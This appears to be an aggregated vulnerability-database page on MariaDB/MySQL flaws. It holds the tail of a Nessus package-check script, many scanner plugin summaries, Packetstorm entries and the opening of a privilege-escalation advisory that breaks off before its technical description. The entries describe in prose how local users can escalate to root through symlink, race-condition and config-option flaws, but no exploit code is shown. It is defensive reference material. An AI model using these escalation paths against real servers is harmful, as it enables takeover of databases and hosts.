    if (os_ver == "SLES12" && (! preg(pattern:"^(1|2)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP1/2", os_ver + " SP" + sp);
    if (os_ver == "SLED12" && (! preg(pattern:"^(1|2)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP1/2", os_ver + " SP" + sp);

    flag = 0;
    if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-client-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-debugsource-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-errormessages-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-tools-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-tools-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-client-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-debugsource-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-errormessages-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-tools-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-tools-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient_r18-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient_r18-32bit-10.0.29-22.1")) flag++;
    if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-10.0.29-22.1")) flag++;
    if
(rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-client-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-debugsource-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-errormessages-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient_r18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient_r18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-client-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-debugsource-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-errormessages-10.0.29-22.1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { 
tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mariadb"); }
NASL family: Gentoo Local Security Checks
NASL id: GENTOO_GLSA-201702-18.NASL
description: The remote host is affected by the vulnerability described in GLSA-201702-18 (MariaDB: Multiple vulnerabilities)
Multiple vulnerabilities have been discovered in MariaDB. Please review the CVE identifiers referenced below for details.
Impact : An attacker could possibly escalate privileges, gain access to critical data or complete access to all MariaDB Server accessible data, or cause a Denial of Service condition via unspecified vectors.
Workaround : There is no known workaround at this time.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 97261
published: 2017-02-21
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/97261
title: GLSA-201702-18 : MariaDB: Multiple vulnerabilities

NASL family: SuSE Local Security Checks
NASL id: SUSE_SU-2017-0411-1.NASL
description: This mariadb version update to 10.0.29 fixes the following issues :
- CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896)
- CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)
- CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)
- CVE-2017-3291: unrestricted mysqld_safe
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 97063
published: 2017-02-08
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/97063
title: SUSE SLES12 Security Update : mariadb (SUSE-SU-2017:0411-1)

NASL family: Red Hat Local Security Checks
NASL id: REDHAT-RHSA-2017-2192.NASL
description: An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)
Security Fix(es) :
* It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)
* A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)
* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)
* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)
* Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)
* A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)
* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)
Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 102152
published: 2017-08-03
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/102152
title: RHEL 7 : mariadb (RHSA-2017:2192)

NASL family: Databases
NASL id: MARIADB_5_5_54.NASL
description: The version of MariaDB running on the remote host is 5.5.x prior to 5.5.54. It is, therefore, affected by multiple vulnerabilities :
- A privilege escalation vulnerability exists in scripts/mysqld_safe.sh due to improper handling of arguments to malloc-lib. A local attacker can exploit this, via a symlink attack on error logs, to gain root privileges. (CVE-2016-6664)
- A denial of service vulnerability exists in sql/item_subselect.cc due to improper handling of queries from the select/unit tree. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the check_well_formed_result() function in sql/item.cc due to improper handling of row validation. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the parse_filter_rule() function in sql/rpl_filter.cc that is triggered during the clearing of wildcards. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the safe_charset_converter() function in sql/item.cc due to improper handling of a specially crafted subselect query item. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the st_select_lex::is_merged_child_of() function in sql/sql_lex.cc due to improper handling of merged views or derived tables. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in sql/item.cc due to improper handling of a specially crafted subquery. An authenticated, remote attacker can exploit this to crash the database.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 96489
published: 2017-01-13
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/96489
title: MariaDB 5.5.x < 5.5.54 Multiple Vulnerabilities

NASL family: Debian Local Security Checks
NASL id: DEBIAN_DSA-3770.NASL
description: Several issues have been discovered in the MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB to the new upstream version 10.0.29. Please see the MariaDB 10.0 Release Notes for further details :
- https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 96669
published: 2017-01-23
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/96669
title: Debian DSA-3770-1 : mariadb-10.0 - security update

NASL family: Huawei Local Security Checks
NASL id: EULEROS_SA-2017-1169.NASL
description: According to the versions of the mariadb packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :
- It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)
- A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)
- Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)
- It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)
- Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)
- A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)
- This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)
Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-05-06
modified: 2017-09-08
plugin id: 103007
published: 2017-09-08
reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/103007
title: EulerOS 2.0 SP1 : mariadb (EulerOS-SA-2017-1169)

NASL family: SuSE Local Security Checks
NASL id: SUSE_SU-2017-0408-1.NASL
description: This mysql version update to 5.5.54 fixes the following issues :
- CVE-2017-3318: Unspecified vulnerability affecting Error Handling (bsc#1020896)
- CVE-2017-3317: Unspecified vulnerability affecting Logging (bsc#1020894)
- CVE-2017-3313: Unspecified vulnerability affecting the MyISAM component (bsc#1020890)
- CVE-2017-3312: Insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)
- CVE-2017-3291: Unrestricted mysqld_safe
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 97046
published: 2017-02-07
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/97046
title: SUSE SLES11 Security Update : mysql (SUSE-SU-2017:0408-1)

NASL family: Databases
NASL id: MARIADB_5_5_52.NASL
description: The version of MariaDB running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities :
- An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492)
- An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616)
- An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624)
- An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626)
- An unspecified flaw exists in the Federated subcomponent that allows an authenticated remote attacker to cause a denial of service condition. (CVE-2016-5629)
- A security bypass vulnerability exists that allows an authenticated, remote attacker to bypass file access restrictions and create the /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. (CVE-2016-6663)
- An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283)
- A flaw exists in the Item_field::fix_after_pullout() function within file sql/item.cc when handling a prepared statement with conversion to semi-join. An authenticated, remote attacker can exploit this to cause a denial of service condition.
- An assertion flaw exists in the mysql_admin_table() function within file sql/sql_admin.cc when handling the re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to cause a denial of service condition.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 95633
published: 2016-12-08
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/95633
title: MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities

NASL family: Databases
NASL id: MARIADB_10_1_18.NASL
description: The version of MariaDB running on the remote host is 10.1.x prior to 10.1.18. It is, therefore, affected by multiple vulnerabilities :
- An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492)
- An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616)
- An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624)
- An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626)
- An unspecified flaw exists in the Federated subcomponent that allows an authenticated remote attacker to cause a denial of service condition. (CVE-2016-5629)
- A security bypass vulnerability exists that allows an authenticated, remote attacker to bypass file access restrictions and create the /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. (CVE-2016-6663)
- An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283)
- A flaw exists in the Item_field::fix_after_pullout() function within file sql/item.cc when handling a prepared statement with conversion to semi-join. An authenticated, remote attacker can exploit this to cause a denial of service condition.
- An assertion flaw exists in the mysql_admin_table() function within file sql/sql_admin.cc when handling the re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to cause a denial of service condition.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 95632
published: 2016-12-08
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/95632
title: MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities

NASL family: FreeBSD Local Security Checks
NASL id: FREEBSD_PKG_22373C43D72811E6A9A5B499BAEBFEAF.NASL
description: The MySQL project reports :
- CVE-2016-3492: Remote security vulnerability in
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 96510
published: 2017-01-16
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/96510
title: FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf)

NASL family: SuSE Local Security Checks
NASL id: OPENSUSE-2017-257.NASL
description: This mariadb version update to 10.0.29 fixes the following issues :
- CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896)
- CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)
- CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)
- CVE-2017-3291: unrestricted mysqld_safe
last seen: 2020-06-05
modified: 2017-02-21
plugin id: 97277
published: 2017-02-21
reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/97277
title: openSUSE Security Update : mariadb (openSUSE-2017-257)

NASL family: Databases
NASL id: MARIADB_10_0_29.NASL
description: The version of MariaDB running on the remote host is 10.0.x prior to 10.0.29. It is, therefore, affected by multiple vulnerabilities :
- A privilege escalation vulnerability exists in scripts/mysqld_safe.sh due to improper handling of arguments to malloc-lib. A local attacker can exploit this, via a symlink attack on error logs, to gain root privileges. (CVE-2016-6664)
- A denial of service vulnerability exists in the check_duplicate_key() function due to improper handling of error messages. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the destroy() function in sql/sql_select.cc due to improper handling of a specially crafted query. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the date_add_interval() function in sql/sql_time.cc due to improper handling of INTERVAL arguments. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in sql/item_subselect.cc due to improper handling of queries from the select/unit tree. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the check_well_formed_result() function in sql/item.cc due to improper handling of row validation. An authenticated, remote attacker can exploit this to crash the database.
- A denial of service vulnerability exists in the safe_charset_converter() function in sql/item.cc due to improper handling of a specially crafted subselect query item. An authenticated, remote attacker can exploit this to crash the database.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 96486
published: 2017-01-13
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/96486
title: MariaDB 10.0.x < 10.0.29 Multiple Vulnerabilities

NASL family: CentOS Local Security Checks
NASL id: CENTOS_RHSA-2017-2192.NASL
description: An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)
Security Fix(es) :
* It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)
* A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)
* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)
* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)
* Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)
* A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)
* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)
Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 102755
published: 2017-08-25
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/102755
title: CentOS 7 : mariadb (CESA-2017:2192)

NASL family: Huawei Local Security Checks
NASL id: EULEROS_SA-2017-1170.NASL
description: According to the versions of the mariadb packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :
- It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)
- A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)
- Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)
- It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)
- Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)
- A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)
- This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)
Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-05-06
modified: 2017-09-08
plugin id: 103008
published: 2017-09-08
reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/103008
title: EulerOS 2.0 SP2 : mariadb (EulerOS-SA-2017-1170)

NASL family: Scientific Linux Local Security Checks
NASL id: SL_20170801_MARIADB_ON_SL7_X.NASL
description: The following packages have been upgraded to a later upstream version: mariadb (5.5.56).
Security Fix(es) :
- It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)
- A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)
- Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)
- It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)
- Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)
- A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)
last seen: 2020-03-18
modified: 2017-08-22
plugin id: 102648
published: 2017-08-22
reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/102648
title: Scientific Linux Security Update : mariadb on SL7.x x86_64 (20170801)
Packetstorm
data source https://packetstormsecurity.com/files/download/139491/mysql-chowned.txt
id PACKETSTORM:139491
last seen 2016-12-05
published 2016-11-02
reporter Dawid Golunski
source https://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html
title MySQL / MariaDB / PerconaDB Root Privilege Escalation

data source https://packetstormsecurity.com/files/download/139476/db-escalate.txt
id PACKETSTORM:139476
last seen 2016-12-05
published 2016-11-02
reporter Dawid Golunski
source https://packetstormsecurity.com/files/139476/MySQL-MariaDB-PerconaDB-Privilege-Escalation-Race-Condition.html
title MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition
Seebug
bulletinFamily exploit
description
- Release date: 01.11.2016
- Discovered by: Dawid Golunski

I. VULNERABILITY
-------------------------

MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition

MariaDB
  < 5.5.52
  < 10.1.18
  < 10.0.28

MySQL
  <= 5.5.51
  <= 5.6.32
  <= 5.7.14

Percona Server
  < 5.5.51-38.2
  < 5.6.32-78-1
  < 5.7.14-8

Percona XtraDB Cluster
  < 5.6.32-25.17
  < 5.7.14-26.17
  < 5.5.41-37.0

II. BACKGROUND
-------------------------

MySQL:

"MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications."

"Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software."

http://www.mysql.com/products/
http://www.mysql.com/why-mysql/

--

MariaDB:

"MariaDB is one of the most popular database servers in the world. It’s made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases."

https://mariadb.org/about/

--

PerconaDB:

"Percona Server for MySQL® is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability."

https://www.percona.com/software/mysql-database/percona-server

III. INTRODUCTION
-------------------------

Independent research has revealed a race condition vulnerability present in MySQL, MariaDB and PerconaDB databases. The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql'). Successful exploitation would allow an attacker to gain access to all of the databases stored on the affected database server.

The level of access obtained through exploitation could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from the mysql user to the root user, allowing attackers to fully compromise the target server.

IV. DESCRIPTION
